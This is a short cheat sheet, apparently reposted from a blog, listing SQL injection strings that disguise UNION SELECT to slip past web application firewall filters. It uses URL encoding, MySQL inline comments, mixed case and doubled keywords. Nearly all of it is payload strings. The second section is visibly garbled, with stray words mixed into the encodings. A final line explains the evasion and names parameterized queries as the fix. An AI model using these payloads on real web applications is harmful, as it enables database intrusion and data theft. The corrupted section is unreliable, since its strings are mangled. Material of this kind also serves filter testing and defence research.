#### WAF bypass strings:
/*!%55nion*/ /*!%53elect*/%55nion (%53elect1,2,3)---+union+distinct+Select+ +union+distinctrow+Select+/**//*!12345union SELECT*//**/ /**//*!50000union SELECT*//**/ /**/UNION/**//*!50000select*//**/ /*!50000union SeLeCt*/Union/*!50000%53elect*/+ #uNiOn +#sEleCt+ #1q%0aunion all#qa%0a#%0AsEleCt/*!%55nion*/ /*!%53elect*/ /*!u%6eion*/ /*!se%6cect*/+un/**/Ion+se/**/lect Uni%0bon+se%0blect%2f**%2funion%2f**%2fselect Union%23foo*%2f*bar%0d%0aselect%23foo%0d%0A REVERSE (Noinu)+REVERSE (tceles)/*--*/Union/*--*/Select/*--*/Union (/*!/**/SeleCT */1,2,3) /*!union*/+/*!select*/Union+/*!select*/ /**/Union/**/Select/**/ /**/UNIon/**/SEleCt/**/ /**//*!union*//**//*!select*//**/ /*!union*/ /*! SelECt*/+union+distinct+Select+ +union+distinctrow+Select+ +union%0d%0aselect%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/un? +un/**/Ion+se/**/lect+ +ununionion+seselectlect+ +uni%0bon+se%0blect+%252f%252a*/union%252f%252a/Select%252f%252a*//%2a%2a/union/%2a%2a/Select/%2a%2a/%2f**%2funion%2f**%2fselect%2f**%2f Union%23foo*%2f*bar%0d%0aselect%23foo%0d%0A/*! UnIoN*/select+

#### UNION SELECT bypass using the URL-encoding method:
(Several strings in this section appear to have been corrupted in translation; they are reproduced as found.)
%55nion (%53elect) Union%20distinct%20SelectUnion% -%64istinctro% $%20SelectUnion%2053elect% at?%0 auion% -?% at?%0aselect% at? zen?%0 Aunion all%23zen%0a%23zen%0Aselect%55nion%53eLEct u%6eion se%6cect Unio%6e%73elect Unio%6e% -%64istinc% About% -%73elect Uni%6FN Distinct%52ow s%65lect% the%6e%6f% the%6e% A%6c%6c% the% $%6c% $% the%7
reprint [email protected] Blog: http://www.cnblogs.com/perl6/p/6120045.html#3573210
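SQL injection: bypassing UNION SELECT filtering
The strings above disguise the same UNION SELECT keyword pair with URL encoding, MySQL inline comments, mixed case, whitespace substitutes or doubled keywords, so a filter that matches literal keywords before the input is decoded and normalized will miss them; parameterized queries remove the dependence on such filters.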